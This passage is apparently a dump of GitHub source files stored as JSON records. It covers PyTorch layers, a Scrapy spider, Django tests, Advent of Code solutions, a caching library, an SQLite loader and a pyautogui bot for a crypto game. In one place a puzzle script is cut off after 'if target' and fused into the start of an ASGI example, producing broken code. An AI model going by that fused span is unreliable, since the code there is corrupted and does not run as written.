padding_mode=\"zeros\"):\n super(SparseConv2d, self).__init__()\n self.in_channels = in_c \n self.out_channels = out_c\n self.kernel_size = kernel_size\n self.stride = stride \n self.padding = padding \n self.dilation = dilation\n self.groups = groups\n self.padding_mode = padding_mode\n\n ## define weight \n self.weight = 
nn.Parameter(torch.Tensor(\n out_c, in_c // groups, *kernel_size\n ))\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_c))\n else:\n self.register_parameter('bias', None)\n self.threshold = nn.Parameter(torch.Tensor(out_c))\n self.weight_mask = WeightMaskStep.apply\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n nn.init.uniform_(self.bias, -bound, bound)\n with torch.no_grad():\n self.threshold.data.fill_(0.)\n\n def forward(self, x):\n weight_shape = self.weight.shape \n threshold = self.threshold.view(weight_shape[0], -1)\n weight = torch.abs(self.weight)\n weight = weight.view(weight_shape[0], -1)\n weight = weight - threshold\n mask = self.weight_mask(weight)\n mask = mask.view(weight_shape)\n ratio = torch.sum(mask) / mask.numel()\n # print(\"threshold {:3f}\".format(self.threshold[0]))\n # print(\"keep ratio {:.2f}\".format(ratio))\n if ratio <= 0.01:\n with torch.no_grad():\n self.threshold.data.fill_(0.)\n threshold = self.threshold.view(weight_shape[0], -1)\n weight = torch.abs(self.weight)\n weight = weight.view(weight_shape[0], -1)\n weight = weight - threshold\n mask = self.weight_mask(weight)\n mask = mask.view(weight_shape)\n masked_weight = self.weight * mask\n\n conv_out = torch.nn.functional.conv2d(x, masked_weight, bias=self.bias, stride=self.stride,\n padding=self.padding, dilation=self.dilation, groups=self.groups)\n return conv_out\n\n def extra_repr(self):\n s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'\n ', stride={stride}')\n if self.padding != (0,) * len(self.padding):\n s += ', padding={padding}'\n if self.dilation != (1,) * len(self.dilation):\n s += ', dilation={dilation}'\n if self.groups != 1:\n s += ', groups={groups}'\n if self.bias is None:\n s += ', bias=False'\n if self.padding_mode != 'zeros':\n s += ', padding_mode={padding_mode}'\n return s.format(**self.__dict__)\n\n def __setstate__(self, state):\n super(SparseConv2d, self).__setstate__(state)\n if not hasattr(self, 'padding_mode'):\n self.padding_mode = 'zeros'\n","repo_name":"IntelLabs/FP8-Emulation-Toolkit","sub_path":"mpemu/module_wrappers/adasparse.py","file_name":"adasparse.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"14717810934","text":"n = int(input())\ndata = list(map(int,input().split()))\n\ndata.sort()\n\ntarget = 1\nfor x in data:\n if target HttpResponse:\n \"\"\"Handle the GET request\"\"\"\n accept = header.find(b'accept', scope['headers'])\n if accept != b'application/json':\n return 500\n text = json.dumps(info)\n headers = [\n (b'content-type', b'application/json')\n ]\n return 200, headers, text_writer(text)\n\n\nasync def set_info(\n scope: Scope,\n info: Info,\n _matches: RouteMatches,\n content: Content\n) -> HttpResponse:\n \"\"\"Handle the POST request\"\"\"\n content_type = header.find(b'content-type', scope['headers'])\n if content_type != b'application/json':\n return 500\n text = await text_reader(content)\n data = json.loads(text)\n info.update(data)\n return 204\n\napp = Application(info={'name': 'Michael Caine'})\napp.http_router.add({'GET'}, '/info', get_info)\napp.http_router.add({'POST'}, '/info', set_info)\n\nconfig = Config()\nconfig.bind = [\"0.0.0.0:9009\"]\nasyncio.run(serve(app, 
config))\n","repo_name":"rob-blackbourn/bareASGI-tutorial","sub_path":"examples/simple_rest.py","file_name":"simple_rest.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1053358667","text":"\"\"\"Code Created by Amber Linnea Kirylak for Harvard CS50P class Lecture 7\"\"\"\nimport re\n\n#prompt user for email\nemail = input(\"What's your email? \").strip()\n\n#re.search(pattern, string, flags=0)\n\n#how to validate input so there is just an email but not a sentence.\n#sample input: My email address is malan@harvard.edu\nif re.search(r\"^.+@.+\\\.edu$\", email):\n    print(\"Valid\")\nelse:\n    print(\"Invalid\")\n\n'''\n^ matches the start of the string\n$ matches the end of the string or just before the new line at the end of the string\n'''","repo_name":"akirylak/python-practice","sub_path":"validate_regx4.py","file_name":"validate_regx4.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41246940637","text":"from django.db import IntegrityError, transaction\nfrom django.test import TestCase\nfrom users.models import User\nfrom django.core.exceptions import ValidationError\n\n\nclass UsersTest(TestCase):\n    def test_create_user(self):\n        self.assertEquals(0, User.objects.count())\n        u = User.objects.create_user('foo', 'foo@gmail.com', 'secret')\n        self.assertEquals(1, User.objects.count())\n\n        self.assertRaisesRegexp(ValidationError, 'Nick', User.objects.create_user, 'Foo', 'bar@gmail.com', 'secret')\n\n        with transaction.atomic():\n            self.assertRaisesRegexp(IntegrityError, 'email', User.objects.create_user, 'bar', 'foo@gmail.com', 'secret')\n\n        u = User.objects.create_user('bar', 'bar@gmail.com', 'secret')\n        self.assertEquals(2, User.objects.count())\n\n","repo_name":"nonZero/community.hasadna.org.il","sub_path":"users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73984928372","text":"import scrapy\nfrom olx.items import OlxItem\n\n\nclass QuotesSpider(scrapy.Spider):\n    name = \"property\"\n    allowed_domains = ['go.olx.com.br']\n\n    def __init__(self, region, apartment, **kwargs):\n        if region == \"\":\n            self.start_urls = ['https://go.olx.com.br/imoveis']\n        else:\n            region = region.replace(\" \", \"-\")\n            if apartment == \"True\":\n                self.start_urls = [f'https://go.olx.com.br/grande-goiania-e-anapolis/{region}/imoveis/venda/apartamentos']\n            else:\n                self.start_urls = [f'https://go.olx.com.br/grande-goiania-e-anapolis/{region}/imoveis/venda/casas']\n\n    def start_requests(self):\n        headers= {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'}\n        for url in self.start_urls:\n            yield scrapy.Request(url=url, headers=headers, callback=self.parse)\n    \n    def parse(self, response):\n        headers= {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'}\n        last_page_link = response.css("div.sc-hmzhuo.hMZElg.sc-jTzLTM.iwtnNi > a::attr(href)").extract()[0]\n        last_page_number = int(last_page_link.split('?o=')[1])\n        for page_number in range(2, last_page_number + 1):\n            page_url = self.start_urls[0] + f'?o={page_number}'\n            yield scrapy.Request(page_url, headers=headers, callback=self.parse_page)\n\n    def parse_page(self, response):\n        items = OlxItem()\n        property_list = response.css(\".sc-1fcmfeb-2\")\n        for property_item in 
property_list:\n items['href'] = property_item.css(\"a::attr(href)\").extract()\n content = property_item.css(\".fnmrjs-2.jiSLYe\")\n if content == []:\n print(\"\\n2\\n\")\n content = property_item.css(\"div.sc-12rk7z2-3.fqDYpJ\")\n items['title'] = content.css(\"div.sc-12rk7z2-5.fXzBqN > div >h2::attr(title)\").extract()\n items['text'] = content.css(\"div.sc-12rk7z2-6.bmfccv > div > div > span::text\").extract()\n items['price'] = content.css(\"div.sc-1kn4z61-1.hzqyCO > span::text\").extract()\n if len(items['price']) > 1:\n items['price'] = items['price'][0]\n date_hour = content.css(\".sc-11h4wdr-0.cHSTFT.sc-ifAKCX.cmFKIN::text\").extract()\n try:\n items['date'] = date_hour[0]\n except IndexError:\n items['date'] = \"\"\n try:\n items['hour'] = date_hour[1]\n except IndexError:\n items['hour'] = \"\"\n else:\n print(\"\\n1\\n\")\n items['title'] = content.css(\".fnmrjs-6.iNpuEh>div>h2::attr(title)\").extract()\n items['text'] = content.css(\"div.fnmrjs-6.iNpuEh>div>span::text\").extract()\n items['price'] = content.css(\"div.fnmrjs-7.erUydy > div.fnmrjs-9.gqfQzY > div > div > span::text\").extract()\n if len(items['price']) > 1:\n items['price'] = items['price'][0]\n date_hour = content.css(\"div.fnmrjs-7.erUydy > div.fnmrjs-10.gHqbSa > div > div > span::text\").extract()\n try:\n items['date'] = date_hour[0]\n except IndexError:\n items['date'] = \"\"\n try:\n items['hour'] = date_hour[1]\n except IndexError:\n items['hour'] = \"\"\n yield items","repo_name":"luizhenriquemaia/scrapy-olx","sub_path":"olx/spiders/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39170717935","text":"def readLines(fileName):\n\n with open(fileName) as f:\n return [line.rstrip() for line in f.readlines()]\n\ndef parseLines(lines):\n import re\n\n ops = []\n \n for l in lines:\n match = re.search('(acc|jmp|nop)\\s([+-])([\\d]+)', l)\n op, sign, value = match.groups()\n\n value = int(value) * -1 if sign == '-' else int(value)\n\n ops.append((op, value))\n\n return ops\n\n\ndef main():\n import sys\n\n lines = readLines('input')\n ops = parseLines(lines)\n\n\n for i in range(len(ops)):\n accumulator = 0\n currentPC = 0\n seenPC = set()\n\n while currentPC not in seenPC and currentPC < len(ops):\n seenPC.add(currentPC)\n\n # print('-', i, currentPC, len(ops), seenPC)\n op, value = ops[currentPC]\n\n if currentPC == i:\n if op == 'nop': op = 'jmp'\n elif op == 'jmp': op = 'nop'\n\n if op == 'nop':\n currentPC += 1\n elif op == 'acc':\n accumulator += value\n currentPC += 1\n elif op == 'jmp':\n currentPC += value\n\n if currentPC >= len(ops):\n # print(i, accumulator)\n sys.stdout.write(str(accumulator) + '\\n')\n return accumulator \n\nif __name__ == '__main__':\n main()","repo_name":"himohimo/advent-of-code-2020","sub_path":"day-8/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38503874911","text":"from processInputs import get_formatted_input\n\nWIDTH = 25\nHEIGHT = 6\n\n\ndef part1(data):\n imageData = str(data)\n pointer = 0\n minZeroes = 999999\n output = 0\n while pointer < len(imageData):\n digitCount = [0, 0, 0]\n for i in range(WIDTH * HEIGHT):\n currentPixel = imageData[pointer + i]\n digitCount[int(currentPixel)] += 1\n if digitCount[0] < minZeroes:\n minZeroes = digitCount[0]\n output = digitCount[1] * digitCount[2]\n 
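# each layer is WIDTH * HEIGHT characters long; advance to the start of the next layer\n        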
pointer += WIDTH * HEIGHT\n return output\n\n\ndef part2(data):\n imageData = str(data)\n image = []\n for y in range(HEIGHT):\n row = \"\"\n for x in range(WIDTH):\n positionOffset = y * WIDTH + x\n topPixel = -1\n layerOffset = 0\n for z in range(len(imageData) // (WIDTH * HEIGHT)):\n pixel = imageData[positionOffset + layerOffset]\n if pixel != '2':\n topPixel = pixel\n break\n layerOffset += WIDTH * HEIGHT\n row += topPixel\n image.append(row)\n formattedImage = \"\\n\"\n for i in image:\n formattedImage += i.replace(\"1\", \"███\").replace(\"0\", \" \") + \"\\n\"\n return formattedImage\n\n\nINPUT = get_formatted_input(8)\nprint(part1(INPUT), part2(INPUT))\n","repo_name":"ComputahSaysNo/AOC_2019","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40403795015","text":"import uuid\n\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy_utils import UUIDType, Timestamp\n\nfrom core.extensions import db\n\n\nColumn = db.Column\nrelationship = relationship\n\n\nclass CRUDMixin(object):\n @classmethod\n def create(cls, **kwargs):\n if issubclass(cls, SurrogatePK):\n unique_id = uuid.uuid4()\n if not kwargs.get(\"id\"):\n kwargs[\"id\"] = unique_id\n instance = cls(**kwargs)\n return instance.save()\n\n def update(self, commit=True, **kwargs):\n for attr, value in kwargs.items():\n setattr(self, attr, value)\n return commit and self.save(commit)\n\n def save(self, commit=True):\n db.session.add(self)\n if commit:\n db.session.commit()\n return self\n\n def delete(self, commit=True):\n db.session.delete(self)\n return commit and db.session.commit()\n\n\nclass SurrogatePK(object):\n \"\"\"A mixin that adds a surrogate UUID 'primary key' column named ``id`` to\n any declarative-mapped class.\"\"\"\n\n __table_args__ = {\"extend_existing\": True}\n\n id = db.Column(UUIDType(binary=False), primary_key=True)\n\n\nclass Model(CRUDMixin, db.Model, Timestamp, SurrogatePK):\n __abstract__ = True\n\n @classmethod\n def exists(cls, ent_id):\n result = cls.query.get(ent_id)\n return result is not None\n","repo_name":"Turall/flask-rest-boilerplate","sub_path":"database/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"9815277692","text":"# Prompts the user for an integer N and finds all perfect numbers up to N.\n# Quadratic complexity, can deal with small values only.\n\n\nimport sys\n\n# Insert your code here\n\ntry:\n nb=int(input('Input an integer: '))\nexcept ValueError:\n print('Incorrect input, giving up.')\n sys.exit()\ndef isperfect(n):\n sum=0\n for i in range(2,n+1):\n if n%i==0:\n sum += n/i\n if sum==n:\n return True\n else:\n return False\n\nfor i in range(1,nb+1):\n if isperfect(i):\n print(f'{i} is a perfect number.')","repo_name":"Jerenyaoyelu/Python-Programming---COMP9021","sub_path":"challenges/6/perfect.py","file_name":"perfect.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"72919092852","text":"class Node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\nclass NodeMgmt:\n def __init__(self, data):\n self.head = Node(data)\n\n def add(self, data):\n if self.head == '':\n self.head = Node(data)\n else:\n node = self.head\n while node.next:\n node = node.next\n node.next = 
Node(data)\n\n    def delete(self, data):\n        if self.head == '':\n            return None\n        # if the node to delete is self.head,\n        if self.head.data == data:\n            temp = self.head\n            self.head = self.head.next\n            del temp\n        else:\n            node = self.head\n            while node.next: # self.head is already ruled out, so check from self.head.next onward\n                if node.next.data == data:\n                    temp = node.next\n                    node.next = node.next.next\n                    del temp\n                else:\n                    node = node.next\n\n    def desc(self):\n        node = self.head\n        while node:\n            print(node.data)\n            node = node.next \n\n# create nodes\nlinkedlist = NodeMgmt(0)\nlinkedlist.desc()\nfor i in range(1,10):\n    linkedlist.add(i)\n# linkedlist.desc()\n# for i in range(1,10):\n#     linkedlist.delete(i)\n# linkedlist.desc()\n","repo_name":"jeleedev/wecode26-study","sub_path":"Algorithm/jaewon/002_linked_list.py","file_name":"002_linked_list.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19769052581","text":"from databases import Database\nfrom app.models.models import UserList, MessageList, MessageCreate, User\nfrom typing import Optional\n\n\nclass BaseRepository:\n    def __init__(self, db: Database) -> None:\n        self.db = db\n\n\nclass UsersRepository(BaseRepository):\n\n    async def get_all_users(self) -> Optional[UserList]:\n        USERS_QUERY = \"\"\"\n        SELECT * from messaging.users\n        \"\"\"\n        users = await self.db.fetch_all(query=USERS_QUERY)\n        return UserList(users)\n\n    async def get_user_by_name(self, user_name: str) -> Optional[User]:\n        USERS_QUERY = \"\"\"\n        SELECT * from messaging.users \n        WHERE user_name = :user_name\n        \"\"\"\n        user = await self.db.fetch_one(query=USERS_QUERY, values={\"user_name\": user_name})\n        if not user:\n            return None\n        return User(**user)\n\n\nclass MessagesRepository(BaseRepository):\n\n    async def get_messages_user(self, user_id: int) -> MessageList:\n        GET_MESSAGES_QUERY = \"\"\"\n        SELECT * from messaging.messages \n        WHERE created_at >= current_date - interval '30 days'\n        AND (sender_id = :sender_id \n        OR recipient_id = :recipient_id);\n        \"\"\"\n        messages = await self.db.fetch_all(query=GET_MESSAGES_QUERY,\n                                           values={\"sender_id\": user_id, \"recipient_id\": user_id})\n        return MessageList(messages)\n\n    async def create_messages(self, message: MessageCreate) -> None:\n        INSERT_MESSAGES_QUERY = \"\"\"\n        INSERT INTO messaging.messages(\n            sender_id,\n            recipient_id,\n            body,\n            created_at,\n            timestamp_sent\n        ) VALUES (:sender_id, :recipient_id, :body, :created_at, :timestamp_sent)\n        \"\"\"\n        await self.db.fetch_one(query=INSERT_MESSAGES_QUERY, values=message.dict())\n","repo_name":"rdibari84/messaging_api","sub_path":"backend/app/db/repos.py","file_name":"repos.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18038349452","text":"import logging\n\nfrom pysolcache.MemoryCache import MemoryCache\nfrom pysolcache.RedisCache import RedisCache\n\nlogger = logging.getLogger(__name__)\n\n\nclass HighCache(object):\n    \"\"\"\n    A High cache, handling L1 (MemoryCache), L2 (RedisCache)\n    Provided MemoryCache and RedisCache must be ready for start/stop.\n    - Keys : str\n    - Values : bytes\n    \"\"\"\n\n    def __init__(self,\n                 memory_cache,\n                 redis_cache):\n        \"\"\"\n        Constructor\n        :param memory_cache: MemoryCache\n        :type memory_cache: MemoryCache\n        :param redis_cache: RedisCache\n        :type redis_cache: RedisCache\n        \"\"\"\n\n        # Params\n        self._memory_cache = memory_cache\n        self._redis_cache = redis_cache\n\n        if not 
isinstance(self._memory_cache, MemoryCache):\n raise Exception(\"MemoryCache required\")\n elif not isinstance(self._redis_cache, RedisCache):\n raise Exception(\"RedisCache required\")\n\n # Start\n self.start_cache()\n\n # Ok\n logger.info(\"Initialize : started\")\n\n # ========================================\n # START / STOP (LOCKED)\n # ========================================\n\n def start_cache(self):\n \"\"\"\n Start\n \"\"\"\n\n # Safer : start if required\n\n # noinspection PyProtectedMember\n s = self._memory_cache._is_started\n if not s:\n logger.warning(\"_memory_cache : _is_started=%s, forcing start_cache now\", s)\n self._memory_cache.start_cache()\n\n # noinspection PyProtectedMember\n s = self._redis_cache._is_started\n if not s:\n logger.warning(\"_redis_cache : _is_started=%s, forcing start_cache now\", s)\n self._redis_cache.start_cache()\n\n def __del__(self):\n \"\"\"\n Destructor\n \"\"\"\n\n self.stop_cache()\n\n def stop_cache(self):\n \"\"\"\n Stop\n \"\"\"\n\n # noinspection PyProtectedMember\n s = self._memory_cache._is_started\n if s:\n self._memory_cache.stop_cache()\n\n # noinspection PyProtectedMember\n s = self._redis_cache._is_started\n if s:\n self._redis_cache.stop_cache()\n\n # ========================================\n # GET\n # ========================================\n\n def get(self, key, l1=True, l2=True):\n \"\"\"\n Get from cache.\n :param key: Any key\n :type key: str\n :param l1: fetch from L1?\n :type l1: bool\n :param l2: fetch from L2?\n :type l2: bool\n \"\"\"\n\n if l1:\n v = self._memory_cache.get(key)\n if v:\n return v\n\n if l2:\n v = self._redis_cache.get(key)\n if v:\n return v\n\n return None\n\n def getex(self, key, l1=True, l2=True):\n \"\"\"\n Get from cache.\n :param key: Any key\n :type key: str\n :param l1: fetch from L1?\n :type l1: bool\n :param l2: fetch from L2?\n :type l2: bool\n :return tuple (bytes or None, integer 0 for miss, 1 for L1 hit, 2 for L2 hit)\n :rtype tuple\n \"\"\"\n\n if l1:\n v = self._memory_cache.get(key)\n if v:\n return v, 1\n\n if l2:\n v = self._redis_cache.get(key)\n if v:\n return v, 2\n\n return None, 0\n\n # ========================================\n # REMOVE\n # ========================================\n\n def remove(self, key, l1=True, l2=True):\n \"\"\"\n Remove a key from cache.\n :param key: Any key\n :type key: str\n :param l1: remove from L1?\n :type l1: bool\n :param l2: remove from L2?\n :type l2: bool\n \"\"\"\n\n if l1:\n self._memory_cache.remove(key)\n\n if l2:\n self._redis_cache.remove(key)\n\n # ========================================\n # PUT\n # ========================================\n\n def put(self, key, val, ttl_ms, l1=True, l2=True):\n \"\"\"\n Put in cache\n :param key: Any key\n :type key: str\n :param val: Any val\n :type val: bytes\n :param ttl_ms: Ttl in ms\n :type ttl_ms : int\n :param l1: put in L1?\n :type l1: bool\n :param l2: put in L2?\n :type l2: bool\n :return tuple bool,bool (true if cached in L1, true if cached in L2)\n :rtype tuple\n \"\"\"\n\n b_l1 = False\n b_l2 = False\n\n if l1:\n b_l1 = self._memory_cache.put(key, val, ttl_ms)\n if l2:\n b_l2 = self._redis_cache.put(key, val, ttl_ms)\n\n return b_l1, b_l2\n","repo_name":"champax/pysolcache","sub_path":"pysolcache/HighCache.py","file_name":"HighCache.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41699565413","text":"#This file enables populating dividends.sqlite\nimport sqlite3\nimport 
json\nimport numpy as np\nimport os\n\ndef run_sqlite(scriptDirectory):\n\tsql_create_projects_table = ''' CREATE TABLE IF NOT EXISTS repo_schedules \n\t\t\t\t\t\t\t\t\t (indice text, t1 real, t2 real, t3 real, t4 real, t5 real, t6 real, t7 real, t8 real, t9 real, t10 real, t11 real, t12 real, t13 real, t14 real, date text); '''\n\n\tsql_insert_repo = ''' INSERT INTO repo_schedules(indice,t1,t2,t3,t4,t5,t6,t7,t8,t9,t10,t11,t12,t13,t14,date) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) '''\n\n\n\tconn = sqlite3.connect(os.path.join(scriptDirectory, 'output', 'repo.sqlite'))\n\tc = conn.cursor()\n\tc.execute(sql_create_projects_table)\n\n\t#inserting data in the table \n\tuniverse = None\n\twith open(os.path.join(scriptDirectory, 'output/universe_repo_cleaned.json'), 'r') as f:\n\t\tuniverse = json.load(f)\n\tvalues = np.array(list(universe.values()))[:,1]\n\tdates = np.array(list(universe.values()))[:,2]\n\tdates = dates.reshape((len(dates),1)) \n\tindexes = np.array(list(universe.keys()))\n\tindexes = indexes.reshape((len(indexes),1))\n\trepo_schedules = np.column_stack((indexes,values,dates))\n\n\tfor i,div_schedule in enumerate(repo_schedules):\n\t\tindice = div_schedule[0]\n\t\tdate = div_schedule[2]\n\t\t#SHANGHAI SE 50 is deleted\n\t\tif(indice!=\"SHANGHAI SE 50\"):\n\t\t\tT1 = div_schedule[1][0]\n\t\t\tT2 = div_schedule[1][1]\n\t\t\tT3 = div_schedule[1][2]\n\t\t\tT4 = div_schedule[1][3]\n\t\t\tT5 = div_schedule[1][4]\n\t\t\tT6 = div_schedule[1][5]\n\t\t\tT7 = div_schedule[1][6]\n\t\t\tT8 = div_schedule[1][7]\n\t\t\tT9 = div_schedule[1][8]\n\t\t\tT10 = div_schedule[1][9]\n\t\t\tT11 = div_schedule[1][10]\n\t\t\tT12 = div_schedule[1][11]\n\t\t\tT13 = div_schedule[1][12]\n\t\t\tT14 = div_schedule[1][13]\n\n\t\t\tc.execute(sql_insert_repo,(indice,T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,date))\n\n\tconn.commit()\n\tconn.close()","repo_name":"mChataign/smileCompletion","sub_path":"adam_api_repo_curve_anomaly_detection/script_sql/sqlite_populate.py","file_name":"sqlite_populate.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"7561184206","text":"import os, sys\nfrom django.conf import settings\n\nDIRNAME = os.path.dirname(__file__)\nsettings.configure(DEBUG=True,\n DATABASES={\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n },\n #ROOT_URLCONF='myapp.urls',\n CMS_TEMPLATES = ( ('template_for_tests.html', 'Test template'), ),\n CMS_MODERATOR = False,\n CMS_PERMISSION = False,\n TEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.request',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'cms.context_processors.media',\n 'sekizai.context_processors.sekizai',\n ),\n INSTALLED_APPS = (\n #'cmsplugin-rt.cmsplugin_rt',\n 'cmsplugin_rt',\n 'cmsplugin_rt.button',\n #'cmsplugin_rt.facebook_button',\n #'cmsplugin_rt.hbar',\n #'cmsplugin_rt.mailchimp_form',\n #'cmsplugin_rt.meta_icons',\n #'cmsplugin_rt.open_graph',\n #'cmsplugin_rt.resizeable_picture',\n #'cmsplugin_rt.self_calc_pagination',\n #'cmsplugin_rt.spacer',\n #'cmsplugin_rt.style_modifier',\n #'cmsplugin_rt.text_minimal_markup',\n #'cmsplugin_rt.twitter_button',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 
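# the django CMS stack and its dependencies follow; 'south' provided schema migrations before Django 1.7\n                        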
#'django.contrib.markup',\n 'south',\n 'cms',\n 'mptt',\n 'menus',\n 'sekizai',\n 'cms.plugins.file',\n 'cms.plugins.link',\n 'cms.plugins.picture',\n 'cms.plugins.text',\n 'cms.plugins.video',\n ),\n )\n\n\n#from cms.test_utils.util.context_managers import SettingsOverride\n\nfrom django.test.simple import DjangoTestSuiteRunner\ntest_runner = DjangoTestSuiteRunner(verbosity=2)\nfailures = test_runner.run_tests(['cmsplugin_rt', ])\nif failures:\n sys.exit(failures)\n","repo_name":"RacingTadpole/cmsplugin-rt","sub_path":"tests/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"39921461961","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # PinPV Fig 1\n# \n# This journal shows how to use the Analysis function inside bifacialVF to call for PV Mismatch IV curve calculation and plotting for different irradiance values.\n# \n# Estimating and parameterizing mismatch power loss in bifacial photovoltaic systems\n# Chris Deline,Silvana Ayala Pelaez,Sara MacAlpine,Carlos Olalla\n# First published: 06 March 2020 https://doi.org/10.1002/pip.3259Citations: 16\n# \n\n# In[1]:\n\n\nimport bifacialvf\nimport pandas as pd\n\n\n# In[2]:\n\n\n# SETUP:\nCity='Cairo'\nWeatherFile = 'EGY_Cairo.Intl.Airport.623660_ETMY'\nLatitude = 30.13\nLongitude= 31.4\nTimezone = 2\nTilt = 10\nAzimuth = 180\nGroundClearance = 0.15\nRtR = 1.5\nRowType = 'interior'\nTransmissionFactor = 0.013\nCellRows = 6\nPVfrontSurface = 'glass'\nPVbackSurface = 'glass'\nAlbedo = 0.62\nTracking = False\ncalculatePVMismatch = True\nPortraitorLandscape = 'landscape'\n\n\n# In[3]:\n\n\n# PVMismatch calculation\n# BifacialVF front and rear irradiance values for June 21st. 
at 2 PM\nfrontGTIrow = [927.6982631, 928.4082993, 928.8050623, 931.0767397, 933.0536854, 933.8064969]\nbackGTIrow = [131.7201933, 47.90228722, 38.49283059, 54.58803934, 100.6857589, 194.5133033]\n\nportraitorlandscape='landscape'\nsensorsy=len(frontGTIrow)\ndebug=True\nnumcells=72\nplotflag = True\n\nstdpl, cellsx, cellsy = bifacialvf.analysis.setupforPVMismatch(portraitorlandscape=portraitorlandscape, sensorsy=sensorsy, numcells=numcells)\n\nPowerAveraged, PowerDetailed, sunmatAveraged, sunmatDetailed = bifacialvf.analysis.calculateVFPVMismatch(stdpl=stdpl, cellsx=cellsx, cellsy=cellsy, sensorsy=sensorsy, frontGTIrow=frontGTIrow, backGTIrow=backGTIrow, bififactor=1.0, debug=debug, plotflag = plotflag)\n\nprint(\"Results: \", round(PowerAveraged,3), round(PowerDetailed,2))\n\nprint(portraitorlandscape, \"Cellsx\", cellsx, \"Cellsy\", cellsy)\nprint(pd.DataFrame(stdpl))\nprint(pd.DataFrame(sunmatAveraged).round(3))\npd.DataFrame(sunmatDetailed).round(3)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NREL/bifacialvf","sub_path":"docs/tutorials/(PinPV) Fig 1 IV Curves.py","file_name":"(PinPV) Fig 1 IV Curves.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"38779048466","text":"def check(m):\n    # if a region's request fits within the cap m, grant it in full; otherwise grant only the cap\n    # return success if the granted total stays within the budget M, failure otherwise\n    total = 0\n    for i in range(N):\n        if data[i] <= m:\n            total += data[i]\n        else:\n            total += m\n    if total <= M:\n        return 1\n    else:\n        return 0\n\nN = int(input())\ndata = list(map(int, input().split()))\nM = int(input())\n\ne = max(data)\ns = 1\nsol = 0\nwhile s <= e:\n    # binary-search the cap m between 1 and max(data); if the total fits the budget raise the cap, otherwise lower it\n    m = (s+e)//2\n    if check(m):\n        # the total fits, so try a larger cap\n        sol = m\n        s = m+1\n    else:\n        # the total is over budget, so try a smaller cap\n        e = m-1\nprint(sol)","repo_name":"woonji913/til","sub_path":"코테대비/20190328/예산.py","file_name":"예산.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12092093862","text":"from PIL.ImageOps import grayscale\r\nimport pyautogui\r\nimport time\r\nimport keyboard\r\nimport numpy as np\r\nfrom random import randint\r\nimport win32api, win32con, win32gui\r\nfrom get_window import WindowMgr\r\nimport automation\r\nimport new_map\r\nimport error\r\nimport set_window\r\nimport pygetwindow as gw #USED TO MINIMIZE WINDOWS AND SO ON\r\n\r\n\r\n## Used to get all windows titles\r\n# all_titles = gw.getAllTitles()\r\n# print(all_titles)\r\n\r\n#Titles of the browsers of each account\r\nPessoal = gw.getWindowsWithTitle('bombcrypto - Pessoal — Microsoft\u200b Edge')[0]\r\nConta_1 = gw.getWindowsWithTitle('bombcrypto - Conta 